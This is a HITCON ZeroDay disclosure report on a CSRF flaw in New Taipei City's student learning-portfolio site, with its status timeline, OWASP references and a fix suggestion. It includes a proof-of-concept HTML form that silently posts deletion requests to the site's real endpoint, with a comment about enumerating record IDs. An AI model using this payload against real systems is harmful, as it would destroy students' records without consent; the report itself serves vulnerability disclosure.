新北市教育局 學生學習歷程檔案刪除CSRF漏洞 - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2020-00051
  •  發信 Vendor: 新北市教育局
  • Title: 新北市教育局 學生學習歷程檔案刪除CSRF漏洞
  • Introduction: 可以利用跨站偽造請求,刪除學生的學習歷程檔案

處理狀態

目前狀態

公開
Last Update : 2020/04/03
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2020/01/19 02:53:15 : 新提交 (由 鄉民 更新此狀態)
  • 2020/01/19 22:32:45 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/01/21 11:35:17 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/01/21 11:35:17 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/01/21 11:35:17 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2020/04/03 03:00:04 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2020-00051
  • 通報者:鄉民
  • 風險:低
  • 類型:跨站冒名請求 (Cross-Site Request Forgery, CSRF)

參考資料

攻擊者可經由該漏洞惡意操控使用者帳號進行惡意行為。

漏洞說明: OWASP - Cross-Site Request Forgery (CSRF)
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

防禦措施: OWASP - Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://hsa.ntpc.edu.tw/StuLearning/document

敘述

簡述

利用跨站偽造請求,再登入系統後,送出刪除學習歷程的POST請求,即可刪除學生的學習歷程檔案。

復現代碼

<!DOCTYPE html>
<html>
<form action="https://hsa.ntpc.edu.tw/StuLearning/documentdelete" method="POST" target="frm">
    <input name="id" value="300"> <!-- 改成真的資料ID,可以利用窮舉方式實現 -->
    <input name="page" value="1">
    <button>SUBMIT</button>
    <iframe name="frm"><marquee>看不到看不到看不到~~~</marquee></iframe>
</html>

修補建議

加入csrf token

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;